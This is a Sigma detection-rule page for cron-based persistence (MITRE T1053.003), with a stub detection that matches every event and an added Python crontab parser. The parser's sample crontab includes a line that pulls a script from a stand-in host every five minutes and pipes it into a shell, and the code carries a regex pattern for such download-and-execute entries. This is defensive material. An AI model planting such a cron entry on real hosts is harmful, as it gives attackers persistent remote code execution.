title: Cron (T1053.003)
id: df00tech-t1053-003
status: experimental
description: "Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code. The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Adversaries use cron in Linux, macOS, and ESXi environments to execute programs at system startup or on a scheduled basis for persistence, privilege escalation, or execution. Real-world malware families including Kinsing, Skidmap, GoldMax, NKAbuse, Rocke, and Anchor have all leveraged cron for persistence. In ESXi environments, cron jobs must be created directly via the crontab file (e.g., /var/spool/cron/crontabs/root)."
references:
  - https://attack.mitre.org/techniques/T1053/003/
  - https://df00tech.com/detections/T1053.003
author: df00tech
date: 2026/04/17
tags:
  - attack.t1053.003
# NOTE: logsource is auto-derived and may need adjustment for your environment.
# cron only exists on Unix-like hosts (Linux, macOS, ESXi), so product is set to linux rather than windows.
logsource:
  category: process_creation
  product: linux
detection:
  # This detection logic could not be auto-translated; see the KQL/SPL query on df00tech.
  selection:
    EventID: '*'
  condition: selection
falsepositives:
  - "System administrators legitimately scheduling maintenance tasks (log rotation, backups, updates) via crontab"
  - "Configuration management tools (Ansible, Chef, Puppet, SaltStack) writing cron jobs as part of authorized playbook execution"
  - "Software packages that install cron jobs during setup (e.g., package manager hooks, monitoring agents like Datadog, Prometheus node_exporter)"
  - "DevOps pipelines and CI/CD systems that schedule deployment or cleanup tasks using cron"
  - "Database maintenance jobs (MySQL, PostgreSQL) installed by DBAs using crontab"
level: high

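Since the rule body above is still a stub, here is an added example (not df00tech's code and not part of the rule) showing how a defender can parse a crontab file such as /var/spool/cron/crontabs/root and triage its entries. The sample crontab is constructed, and the two triage heuristics (startup execution via @reboot, and a download piped into a shell) are assumptions of this example, not detection logic from the page.

```python
import re
from dataclasses import dataclass, field

# Constructed sample crontab (not real data) in the format cron reads from
# per-user files like /var/spool/cron/crontabs/root.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
SHELL=/bin/sh
0 2 * * * /usr/sbin/logrotate /etc/logrotate.conf
@reboot /opt/agent/start.sh
*/5 * * * * curl -s http://example.invalid/u.sh | sh
"""

CRON_KEYWORDS = {"@reboot", "@yearly", "@annually", "@monthly",
                 "@weekly", "@daily", "@midnight", "@hourly"}

@dataclass
class CronEntry:
    schedule: str
    command: str
    flags: list = field(default_factory=list)

def triage(schedule: str, command: str) -> list:
    """Assumed heuristics: startup persistence and fetch-then-execute pipelines."""
    flags = []
    if schedule == "@reboot":
        flags.append("runs_at_startup")
    if re.search(r"\b(curl|wget)\b.*\|\s*(ba|z|da)?sh\b", command):
        flags.append("downloads_and_pipes_to_shell")
    return flags

def parse_crontab(text: str) -> list:
    """Parse crontab text; comments, blank lines and VAR=value lines are skipped."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^[A-Za-z_]\w*=", line):
            continue
        if line.startswith("@"):                      # keyword form: @reboot cmd
            parts = line.split(None, 1)
            if len(parts) < 2 or parts[0] not in CRON_KEYWORDS:
                continue
            schedule, command = parts
        else:                                         # five time fields + command
            fields = line.split(None, 5)
            if len(fields) < 6:
                continue
            schedule, command = " ".join(fields[:5]), fields[5]
        entries.append(CronEntry(schedule, command.strip(), triage(schedule, command)))
    return entries

def suspicious_entries(text: str) -> list:
    """Return only the entries that tripped at least one heuristic."""
    return [e for e in parse_crontab(text) if e.flags]
```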